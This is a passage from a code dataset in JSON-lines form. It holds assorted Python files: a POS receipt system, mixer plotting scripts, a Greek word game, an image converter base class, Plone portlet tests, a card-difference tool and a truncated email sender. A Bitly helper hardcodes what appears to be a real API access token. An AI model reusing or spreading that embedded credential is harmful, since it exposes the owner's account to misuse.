__init__(self,item_code,item_name,price):\n self.item_code=item_code\n self.item_name=item_name\n self.price=price\n\n### オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list=[]\n self.item_count_list=[]\n self.item_master=item_master\n self.set_datetime()\n \n def set_datetime(self):\n self.datetime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n \n def add_item_order(self,item_code,item_count):\n self.item_order_list.append(item_code)\n self.item_count_list.append(item_count)\n \n def view_item_list(self):\n for item in self.item_order_list:\n print(\"商品コード:{}\".format(item))\n \n # オーダー番号から商品情報を取得する\n def get_item_data(self,item_code):\n for m in self.item_master:\n if item_code == m.item_code:\n return m.item_name,m.price\n \n # オーダー入力\n def input_order(self):\n print(\"いらっしゃいませ!\")\n while True:\n buy_item_code = input(\"購入したい商品コードを入力してください。終了する場合は、0を入力してください >>> \")\n if int(buy_item_code) != 0:\n item = self.get_item_data(buy_item_code)\n if item!=None:\n print(\"{0} ({1}円)が登録されました\".format(item[0], item[1]))\n buy_item_count = input(\"購入個数を入力してください >>> \")\n self.add_item_order(buy_item_code,buy_item_count)\n else:\n print(\"「{}」は商品マスタに存在しません\".format(buy_item_code))\n else:\n print(\"商品登録を終了します。\")\n break\n\n def order_detail(self):\n number = 1\n self.sum_price = 0\n self.sum_count = 0\n self.receipt_name = \"receipt_{}.log\".format(self.datetime)\n self.write_receipt(\"-----------------------------------------------\")\n self.write_receipt(\"オーダー登録された商品一覧\\n\")\n for item_order,item_count in zip(self.item_order_list,self.item_count_list):\n result = self.get_item_data(item_order)\n self.sum_price += result[1] * int(item_count)\n self.sum_count += int(item_count)\n receipt_data = \"{0}.{2}({1}) : ¥{3:,} {4}個 = ¥{5:,}\".format(number, item_order, result[0], result[1], item_count, int(result[1]) * int(item_count))\n self.write_receipt(receipt_data)\n number += 1\n \n # 合計金額、個数の表示\n self.write_receipt(\"-----------------------------------------------\")\n self.write_receipt(\"合計金額:¥{0} {1}個\".format(self.sum_price,self.sum_count))\n \n def calc_money(self):\n if len(self.item_order_list) >= 1:\n while True:\n self.money = input(\"お支払い金額を入力してください >>> \")\n self.change_money = int(self.money) - self.sum_price\n if self.change_money >= 0:\n self.write_receipt(\"お預り:¥{}\".format(self.money))\n self.write_receipt(\"お釣り:¥{}\".format(self.change_money))\n break\n else:\n print(\"¥{} 円不足しています。再度入力してください\".format(self.change_money))\n \n print(\"ありがとうございました。\")\n \n def write_receipt(self,text):\n print(text)\n with open(RECEIPT_FOLDER + \"\\\\\" + self.receipt_name,mode=\"a\",encoding=\"utf-8_sig\") as f:\n f.write(text+\"\\n\") \n \n### マスタ登録\ndef regist_item_by_csv(csv_path):\n print(\"------- マスタ登録開始 ---------\")\n item_master = []\n count=0\n try:\n # item_codeの0が落ちるため、dtypeを設定\n item_master_df = pd.read_csv(csv_path,dtype = {\"item_code\":object})\n for item_code,item_name,price in zip(list(item_master_df[\"item_code\"]),list(item_master_df[\"item_name\"]),list(item_master_df[\"price\"])):\n item_master.append(Item(item_code,item_name,price))\n print(\"{}({})\".format(item_name,item_code))\n count+=1\n print(\"{}品の登録を完了しました。\".format(count))\n print(\"------- マスタ登録完了 ---------\")\n return item_master\n except:\n print(\"マスタ登録が失敗しました\")\n print(\"------- マスタ登録完了 ---------\")\n sys.exit()\n \n\n### メイン処理\ndef main():\n # CSVからマスタへ登録\n item_master=regist_item_by_csv(ITEM_MASTER_CSV_PATH)\n # マスタをオーダーに登録\n order=Order(item_master)\n # オーダー入力\n order.input_order()\n # オーダー番号から商品情報を取得\n order.order_detail()\n order.calc_money()\n\nif __name__ == \"__main__\":\n main()","sub_path":"pos_system.py","file_name":"pos_system.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"506832047","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 10:48:32 2019\n\n@author: wenninger\n\"\"\"\n#TODO/Note: The way the program is written, the program works only under Spyder IPython console, which is not closing a plot after savefig.\n\nimport os\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pylab as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\nfrom Mixer import Mixer,kwargs_Mixer_John\nfrom plotxy import plot, pltsettings,lbl\n\nplt.close() # in case a plot is still open\n\nheadDirectory = 'Impedance_Recovery/Simulated_Curves_2019_12_10/'\n\n#initialise a Mixer object\nM = Mixer('DummyData/John/Unpumped.csv','DummyData/John/Pumped.csv',**kwargs_Mixer_John)\n \nM.Unpumped.convolution_most_parameters_Fit_Calc()\nM.Unpumped.convolution_without_excessCurrent_Fit_Calc()\nfits = [M.Unpumped.chalmers_Fit,M.Unpumped.convolution_Fit,M.Unpumped.convolution_without_excessCurrent_Fit,M.Unpumped.convolution_perfect_IV_curve_Fit]\ndirectories = ['Chalmers','Convolution','Convolution_without_excessCurrent','Convolution_perfect_IV']\nfor i in range(len(fits)):\n print('Process '+directories[i])\n \n # set directory for images\n directory =headDirectory+directories[i]+'/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n \n #Define the used fit in the mixer calculations\n M.Unpumped.set_simulatedIV(fits[i])\n \n plot(M.pumping_Levels_Volt, label='Pumping Level')\n description='Pumping_Level_Volt'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['mV'],title=description.replace('_',' '),close=True)\n \n plot(M.pumping_Levels, label='Pumping Level')\n description='Pumping_Level'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel='alhpa',title=description.replace('_',' '),close=True)\n \n plot(M.Unpumped.rawIVDataOffsetCorrected,'Measurement')\n plot(M.Unpumped.simulatedIV,'Simulation')\n description='Fitting_to_Measurement'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,6.],ylim=[-410,410],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Normal_Resistance'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.9,6.],ylim=[190,410],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Subgap_Resistance'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2,2.6],ylim=[-10,10],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Transission'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.6,2.9],ylim=[0,200],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_Unpumped_Pumped_IV_curves()\n description='Pumped_from_Unpumped_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[0,6.],ylim=[0,400],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,0],ylim=[-400,0],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2.7,2.7],ylim=[-50,50],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-.1,2.7],ylim=[-2,63],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2.7,.1],ylim=[-63,2],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Normal_Resistance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.7,4.7],ylim=[160,310],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Normal_Resistance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-4.7,-2.65],ylim=[-310,-140],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_AC_currents()\n description='SIS_Current_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-.1,6],ylim=[-155,145],title=description.replace('_',' '),close=False)\n description='SIS_Current_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,.1],ylim=[-140,205],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_ySIS()\n description='SIS_Admittance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[0,6],ylim=[-.22,.2],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Admittance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,0],ylim=[-.22,.2],title=description.replace('_',' '),legendColumns=2,close=True)\n \n plt.plot(M.ySIS[0],np.abs(M.ySIS[1]),label='Measurement')\n plt.plot(M.simulated_ySIS[0],np.abs(M.simulated_ySIS[1]),label='Simulation')\n description='SIS_Admittance_Absolute_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[0,6],ylim=[0,.2],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Admittance_Absolute_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,0],ylim=[0,.2],title=description.replace('_',' '),legendColumns=2,close=True)\n\n M.plot_simulated_and_measured_zSIS()\n description='SIS_Impedance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[0,6],ylim=[-30,30],title=description.replace('_',' '),close=False)\n description='SIS_Impedance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[-6,0],ylim=[-30,30],title=description.replace('_',' '),close=True)\n \n plt.plot(M.zSIS[0],np.abs(M.zSIS[1]),label='Measurement')\n plt.plot(M.simulated_zSIS[0],np.abs(M.simulated_zSIS[1]),label='Simulation')\n description='SIS_Impedance_Absolute_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[0,6],ylim=[0,30],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Impedance_Absolute_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[-6,0],ylim=[0,40],title=description.replace('_',' '),legendColumns=2,close=True)\n\n M.plot_mask_steps()\n description='Masked_Regions'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],title=description.replace('_',' '),close=True)\n \n# description='Admittance_Complete'\n# yEmb = M.simulated_yEmb #TODO does not work\n# zEmb = M.simulated_zEmb\n# yPatch = mpatches.Patch(color='none', label='Y = %.2f %.2fj $\\Omega^{-1}$'%(yEmb[0],yEmb[1])) \n# zPatch = mpatches.Patch(color='none', label='Z = %.2f %.2fj $\\Omega$'%(zEmb[0],zEmb[1])) \n# \n# handles, labels = plt.gca().get_legend_handles_labels() # get existing handles and labels\n# handles.append(yPatch) # add new patches and labels to list\n# handles.append(zPatch) # add new patches and labels to list\n# labels.append('Y = %.2f %.2fj $\\mho$'%(yEmb[0],yEmb[1]))\n# labels.append('Z = %.2f %.2fj $\\Omega$'%(zEmb[0],zEmb[1]))\n# \n# plt.legend(handles, labels,loc='best', shadow=False,ncol=2)\n# leg = plt.gca().get_legend()\n# ltext = leg.get_texts() # all the text.Text instance in the legend\n# llines = leg.get_lines() # all the lines.Line2D instance in the legend\n# plt.setp(ltext, fontsize='small')\n# plt.setp(llines, linewidth=1.5) # the legend linewidth\\z\\\n# \n# pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,6],ylim=[-.2,.053],title=description.replace('_',' '),close=True,skip_legend=True)\n \n \n","sub_path":"Simulated_Data_Calculations.py","file_name":"Simulated_Data_Calculations.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191764154","text":"from random import shuffle\r\nfrom time import sleep\r\n\r\nclass SakClass:\r\n\r\n \r\n def __init__(self): \r\n \r\n self.letters= ['Α','Α','Α','Α','Α','Α','Α','Α','Α','Α','Α','Α',\r\n 'Β',\r\n 'Γ','Γ',\r\n 'Δ','Δ',\r\n 'Ε','Ε','Ε','Ε','Ε','Ε','Ε','Ε',\r\n 'Ζ',\r\n 'Η','Η','Η','Η','Η','Η','Η',\r\n 'Θ',\r\n 'Ι','Ι','Ι','Ι','Ι','Ι','Ι','Ι',\r\n 'Κ','Κ','Κ','Κ',\r\n 'Λ','Λ','Λ',\r\n 'Μ','Μ','Μ',\r\n 'Ν','Ν','Ν','Ν','Ν','Ν',\r\n 'Ξ',\r\n 'Ο','Ο','Ο','Ο','Ο','Ο','Ο','Ο','Ο',\r\n 'Π','Π','Π','Π',\r\n 'Ρ','Ρ','Ρ','Ρ','Ρ',\r\n 'Σ','Σ','Σ','Σ','Σ','Σ','Σ',\r\n 'Τ','Τ','Τ','Τ','Τ','Τ','Τ','Τ',\r\n 'Υ','Υ','Υ','Υ',\r\n 'Φ',\r\n 'Χ',\r\n 'Ψ',\r\n 'Ω','Ω','Ω']\r\n \r\n\r\n\r\n def shuffleSak(self):\r\n shuffle(self.letters)\r\n print('ΑΝΑΚΑΤΕΥΕΤΑΙ ΤΟ ΣΑΚΟΥΛΙ')\r\n for i in range(0,4):\r\n sleep(0.7)\r\n print('.', end='', flush=True)\r\n print(\"\\n\")\r\n \r\n\r\n def get(self,numb):\r\n lootedList = []\r\n for number in range(0,numb):\r\n lootedList.append(self.letters.pop(0))\r\n return lootedList\r\n\r\n def throw(self,word,hand):\r\n for letter in range(0,len(word)):\r\n for letter2 in range(0,7):\r\n if(word[letter]==hand[letter2]):\r\n del(hand[letter2])\r\n break\r\n \r\n \r\n \r\n \r\n\r\n def change(self,hand):\r\n newHand= self.get(7)\r\n for number in range(0,7):\r\n self.letters.append(hand.pop(0))\r\n return newHand\r\n\r\n \r\n\r\n\r\n \r\nclass Player:\r\n\r\n def __init__(self,name):\r\n\r\n self.name = name\r\n self.hand = []\r\n self.points = 0\r\n\r\n def updatePlayerPoints(self,word,wordDict):\r\n self.points = wordDict[word]+ self.points\r\n\r\n def fullHandWithLetters(self,sak):\r\n if (len(self.hand)==7):\r\n return True\r\n\r\n if (len(sak.letters) >= (7-len(self.hand))):\r\n self.hand = self.hand + sak.get(7-len(self.hand))\r\n return True\r\n\r\n return False\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\nclass Dictionary:\r\n def __init__(self):\r\n\r\n self.wordDictionary={}\r\n\r\n self.letterValue = {'Α':1,'Ε':1,'Η':1,'Ι':1,'Ν':1,'Ο':1,'Σ':1,'Τ':1,\r\n 'Κ':2,'Π':2,'Ρ':2,'Υ':2,\r\n 'Λ':3,'Μ':3,'Ω':3,\r\n 'Γ':4,'Δ':4,\r\n 'Β':8,'Φ':8,'Χ':8,\r\n 'Ζ':10,'Θ':10,'Ξ':10,'Ψ':10}\r\n\r\n def findWordValue(word):\r\n value=0\r\n for i in range(0,len(word)):\r\n value = self.letterValue[word[i]] + value\r\n return value\r\n \r\n fileGreek7 = open('greek7.txt',encoding='utf-8-sig',mode='r')\r\n\r\n for index in fileGreek7:\r\n currentWord = index.rstrip(\"\\n\")\r\n self.wordDictionary[currentWord]= findWordValue(currentWord)\r\n\r\n fileGreek7.close()\r\n\r\n def findValue(self,word):\r\n value=0\r\n for i in range(0,len(word)):\r\n value = self.letterValue[word[i]] + value\r\n return value\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"mylib21582311.py","file_name":"mylib21582311.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"323948934","text":"from abc import ABC, abstractmethod\nimport typing\n\n\nclass IImageFormatConverter(ABC):\n\n IMAGE_FORMAT = None\n IMAGE_EXTENSION = None\n\n def __init__(\n self, src_file_spec: str, output_file: typing.Optional[str] = None,\n output_folder: typing.Optional[str] = '.', extension: typing.Optional[int] = None, **kwargs) -> None:\n \"\"\"\n :param src_file_spec: File path and file name of the source file.\n :param output_file: Base filename for output image file names.\n :param output_folder: File path for output image file names.\n :param extension: Output file extension\n :param kwargs: Any additional args for overloading child __init__()\n\n \"\"\"\n self.src_file_spec = src_file_spec\n self.output_file = output_file\n self.output_folder = output_folder\n\n self.fmt = self.IMAGE_FORMAT\n self.extension = extension or self.IMAGE_EXTENSION\n\n # If the format or extension is not provided, do not continue.\n if self.fmt is None or self.extension is None:\n raise Exception(f\"{self.__class__.__name__}: Image format or extension is not set.\")\n\n # Used for tracking the time required to convert the pdf to image.\n self.conversion_duration = 0\n\n # Used for providing which class through an exception.\n self.images = []\n\n @abstractmethod\n def convert(self) -> \"IImageFormatConverter\":\n \"\"\"\n Implemented instance of this function should return the instance of the obj\n e.g. -\n\n def convert():\n \n return self\n\n :return:\n self\n \"\"\"\n pass\n","sub_path":"pdf_conversion/converters/image_converter.py","file_name":"image_converter.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399922442","text":"import urllib\nimport json\n\nTOKEN=\"cc922578a7a1c6065a2aa91bc62b02e41a99afdb\"\nROOT_URL=\"https://api-ssl.bitly.com\"\nSHORTEN=\"/v3/shorten?access_token={}&longUrl={}\"\n\nclass BitlyHelper:\n\n\tdef shorten_url(self,longurl):\n\t\ttry:\n\t\t\turl=ROOT_URL + SHORTEN.format(TOKEN, longurl)\n\t\t\tprint(url)\n\t\t\tresponse=urllib.request.urlopen(url).read()\n\t\t\tjr = json.loads(response.decode('utf-8') )\n\t\t\tshorted = jr['data']['url']\n\t\t\tif shorted:\n\t\t\t\treturn shorted\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\n\t\treturn longurl\n\n","sub_path":"bitlyhelper.py","file_name":"bitlyhelper.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616767462","text":"class Person ():\n # how to initialize attributes\n # init method\n def __init__(self,person_name,person_age,person_weight,person_height):\n self.name=person_name\n self.age=person_age\n self.weight=person_weight\n self.height=person_height\n\nperson1 = Person(\"vicky\",20,\"69 kg\" ,\"170 cm\")\n# self = person1\n\nprint(person1.name)\n\nperson2 = Person(\"siva\",18,\"55 kg\",\"159 cm\")\n\nprint(person2.height)\n","sub_path":"class,difaine.py","file_name":"class,difaine.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286087844","text":"def Difference(originalFile, newFile):\n oldfiles = open(originalFile)\n newfiles = open(newFile)\n oldfile = [x[:-1] for x in oldfiles]\n newfile = [x[:-1] for x in newfiles]\n #dictionary of ranges per card\n Cards = {'A':[[12,13],[13,18],[18,50],[50,51],[51,52],[52,53],[53,54],[54,55],[55,74],[74,75],[75,77]],\n 'B':[[12,15],[15,28],[28,32],[32,34],[34,44],[44,46],[46,56],[56,61],[61,64],[64,70],[70,71],[71,73],[73,74],[74,75],[75,76],[76,77]],\n 'C':[[12,17],[17,18],[18,21],[21,25],[25,30],[30,38],[38,46],[46,53],[53,59],[59,64],[64,69],[69,73],[73,74],[74,77]],\n 'D':[[12,20],[20,52],[52,53],[53,54],[54,55],[55,56],[56,57],[57,59],[59,62],[62,65],[65,68],[68,71],[71,74],[74,77]],\n 'E':[[12,14],[14,16],[16,18],[18,20],[20,22],[22,24],[24,26],[26,29],[29,32],[32,35],[35,38],[38,41],[41,44],[44,47],[47,50],[50,53],[53,56],[56,59],[59,65],[65,71],[71,73],[73,74],[74,75],[75,76],[76,77]],\n 'F':[[12,27],[27,29],[29,39],[39,49],[49,51],[51,56],[56,57],[57,63],[63,69],[69,77]],\n 'G':[[12,33],[33,39],[39,77]],\n 'H':[[12,30],[30,32],[32,77]],\n 'J':[[12,15],[15,19],[19,23],[23,25],[25,26],[26,29],[29,40],[40,45],[45,53],[53,54],[54,55],[55,60],[60,68],[68,69],[69,70],[70,71],[71,76],[76,77]],\n 'K':[[12,15],[15,19],[19,23],[23,77]],\n 'M':[[12,77]]}\n class plisn(object):\n def __init__(self, PLISN):\n self.old = {}\n self.new = {}\n self.oldcards = []\n self.newcards = []\n self.consolcards = []\n self.compared = \"\"\n self.PLISN = PLISN\n self.convert()\n\n def convert(self):\n self.order = \"\"\n for i in self.PLISN:\n if ord(i) > 64:\n self.order += str(ord(str(i))-43)\n else:\n self.order += str(ord(str(i)))\n\n def olds(self, card):\n self.old[card[-3:]] = card\n self.oldcards.append(card[-3:])\n def news(self, card):\n self.new[card[-3:]] = card\n self.newcards.append(card[-3:])\n def compare(self):\n ans = self.compared\n order = ['01A', '02A', '03A', '04A', '01B', '02B','03B', '04B','01C', '02C',\n '03C', '04C','01D', '02D','03D', '04D','01E', '02E','03E', '04E','01F',\n '02F','03F', '04F', '01G', '02G','03G', '04G', '01H', '02H','03H', \n '04H','01J', '02J','03J', '04J','01K', '02K','03K', '04K','01M', '02M',\n '03M', '04M']\n for i in order:\n if i in self.newcards or i in self.oldcards:\n self.consolcards.append(i)\n if self.new == {}:\n self.compared += self.old[\"01A\"][:11] + \"D \" + self.old[\"01A\"][13:50] + (\" \" * 27) + self.old[\"01A\"][77:] + '\\n'\n elif self.old == {}:\n for i in self.newcards:\n self.compared += self.new[i] + '\\n'\n else:\n for i in self.consolcards:\n if i not in self.oldcards:\n self.compared += self.new[i][:11] + \"M\" + self.new[i][12:] + '\\n'\n elif i not in self.newcards:\n self.compared += self.old[i][:11] + \"G\"\n for param in Cards[i[-1]]:\t\t\n if self.old[i][param[0]:param[1]].strip() == \"\":\n self.compared += FixLengths(param[1] - param[0])\n else:\n self.compared += 'G' + FixLengths(param[1] - param[0])[1:]\n self.compared += i + '\\n'\n elif i not in self.newcards:\n ans += self.old[i][:11] + \"G\"\n for letter in self.old[i][12:77]:\n if letter != \" \":\n ans += 'G'\n else:\n ans+=\" \"\n ans+=self.old[i][77:]\n self.compared = ans + '\\n'\n elif self.new[i] != self.old[i]:\n self.compared += CompareCards(self.old[i], self.new[i])\t\t\t\t\n self.compared = self.compared[:-1]\n\n def CompareCards(old, new):\n beginCard = new[:11]\n endCard = new[77:]\n mcard = \"\"\n gcard = \"\"\n comparison = \"\"\n keyparam = [[12,17],[12,20],[12,27],[20,52],[55,56]] #key parameters that get g cards even for modifications\n #associated data has not been incorporated yet\n associatedparams = {31:[[50,51]],68:[[50,51]],29:[[51,52]],39:[[18,21]],72:[[52,53],\n [53,54]],111:[[29,39],[39,49],[33,39],[27,29],[51,56],[49,51]]} # add keyparams together for key to check associated data\n for param in Cards[new[-1]]:\n oldparam = CheckCard(param,old)\n newparam = CheckCard(param,new)\n if oldparam == newparam:\n if int(new[-2]) > 1:\n if param in [[13,18],[18,50]]:\n gcard += oldparam\n else:\n mcard+=FixLengths(param[1] - param[0])\n gcard+=FixLengths(param[1] - param[0])\n else:\n mcard+=FixLengths(param[1] - param[0])\n gcard+=FixLengths(param[1] - param[0])\n elif newparam == FixLengths(param[1] - param[0]):\n gcard += 'G' + FixLengths(param[1] - param[0])[1:]\n mcard += FixLengths(param[1] - param[0])\n else:\n mcard += newparam\n if param in keyparam:\n gcard += oldparam\n elif int(new[-2]) > 1:\n if param in [[13,18],[18,50]]:\n gcard += oldparam\n else:\n gcard += FixLengths(param[1] - param[0])\n if mcard.strip() != \"\":\n mcard = beginCard + \"M\" + mcard +endCard + '\\n'\n else:\n mcard = \"\"\n if gcard.strip() != \"\":\n gcard = beginCard + \"G\" + gcard + endCard + '\\n'\n return gcard + mcard\n return mcard\n\n def FixLengths(length):\n return length * \" \"\n\n def CheckCard(param, card):\n return card[param[0]:param[1]]\n\n PLISNs = {}\n\n for i in oldfile:\n if i[6:11].strip() not in PLISNs:\n PLISNs[i[6:11].strip()] = plisn(i[6:11].strip())\n PLISNs[i[6:11].strip()].olds(i)\n else:\n PLISNs[i[6:11].strip()].olds(i)\n for i in newfile:\n if i[6:11].strip() not in PLISNs:\n PLISNs[i[6:11].strip()] = plisn(i[6:11].strip())\n PLISNs[i[6:11].strip()].news(i)\n else:\n PLISNs[i[6:11].strip()].news(i)\n printOrder = []\n with open('_'.join(['Differences_',originalFile,newFile]) +'.txt', 'w') as report:\n for i in PLISNs:\n printOrder.append(PLISNs[i])\n printOrder.sort(key=lambda x: x.order)\n for i in printOrder:\n i.compare()\n if i.compared != \"\":\n report.write(i.compared + '\\n')\n\n oldfiles.close() \n newfiles.close()\n","sub_path":"QEI_NHA_SAP/lib/DIFFERENCE.pyw","file_name":"DIFFERENCE.pyw","file_ext":"pyw","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255096202","text":"# -*- coding: utf-8 -*-\nfrom plone import api\nfrom plone.app.event.base import localized_now\nfrom Products.CMFCore.utils import getToolByName\nfrom genweb.theme.portlets import esdeveniments\nfrom genweb.core.testing import GENWEB_INTEGRATION_TESTING\nfrom plone.app.testing import login\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import TEST_USER_NAME\nfrom plone.app.testing import setRoles\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletRenderer\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom zope.component.hooks import setHooks\nfrom zope.component.hooks import setSite\n\nfrom plone.app.event.dx.behaviors import EventAccessor\n\nfrom datetime import timedelta\nimport unittest2 as unittest\n\nTZNAME = 'Europe/Vienna'\n\n\nclass RendererTest(unittest.TestCase):\n layer = GENWEB_INTEGRATION_TESTING\n\n def setUp(self):\n portal = self.layer['portal']\n self.portal = portal\n self.request = self.layer['request']\n self.wft = getToolByName(self.portal, 'portal_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n setHooks()\n setSite(portal)\n folder_id = self.portal.invokeFactory('Folder', 'test-folder')\n self.folder = self.portal[folder_id]\n\n # Make sure Events use simple_publication_workflow\n self.portal.portal_workflow.setChainForPortalTypes(\n ['Event'], ['simple_publication_workflow']\n )\n\n def create_event(self, context, id='e1', title='New event', days=(1, 1), start=0, end=1, whole_day=False, open_end=False):\n \"\"\" Creates an event with delta days tuple (start, end) beggining from\n now. The start and end arguments are also treated as delta hours.\n \"\"\"\n delta_start = timedelta(hours=start, days=days[0])\n delta_end = timedelta(hours=end, days=days[1])\n\n start = localized_now() + delta_start\n end = localized_now() + delta_end\n\n EventAccessor.event_type = 'Event'\n acc = EventAccessor.create(\n container=context,\n content_id=id,\n title=title,\n start=start,\n end=end,\n timezone=TZNAME,\n whole_day=whole_day,\n open_end=open_end\n )\n acc.location = u'Graz, Austria'\n\n return context[id]\n\n def renderer(self, context=None, request=None, view=None, manager=None,\n assignment=None):\n context = context or self.portal\n request = request or self.request\n view = view or context.restrictedTraverse('@@plone')\n manager = manager or getUtility(\n IPortletManager,\n name='plone.rightcolumn',\n context=self.portal\n )\n assignment = assignment or esdeveniments.Assignment()\n\n return getMultiAdapter(\n (context, request, view, manager, assignment), IPortletRenderer\n )\n\n def test_basic_event(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n\n def test_whole_day_event_spanning_one_day(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder, whole_day=True)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n\n def test_whole_day_event_spanning_two_days(self):\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n login(self.portal, TEST_USER_NAME)\n\n event = self.create_event(self.folder, days=(1, 2), whole_day=True)\n api.content.transition(event, to_state='published')\n portlet = self.renderer(context=self.folder, assignment=esdeveniments.Assignment())\n portlet.update()\n rd = portlet.render()\n\n near_event = portlet.published_events()\n self.assertTrue(len(near_event) == 1)\n self.assertTrue('e1' in rd)\n","sub_path":"genweb/core/tests/test_portlet_calendar.py","file_name":"test_portlet_calendar.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"493375669","text":"import smtplib\nimport time\n\n\ndef send_email(subject, msg):\n try:\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.ehlo()\n server.starttls()\n server.login(\"xxx@gmail.com\", \"xxx\")\n message = 'Subject:{}\\n\\n{}'.format(subject, msg)\n server.sendmail(\"xxx@gmail.com\", \"xxx@gmail.com\", message)\n server.quit()\n print(\"Success\")\n except:\n print(\"Email failed to send.\")\n\n\ndef timer(t):\n try:\n when_to_stop = abs(int(t))\n\n except KeyboardInterrupt:\n return\n except:\n print(\"Not 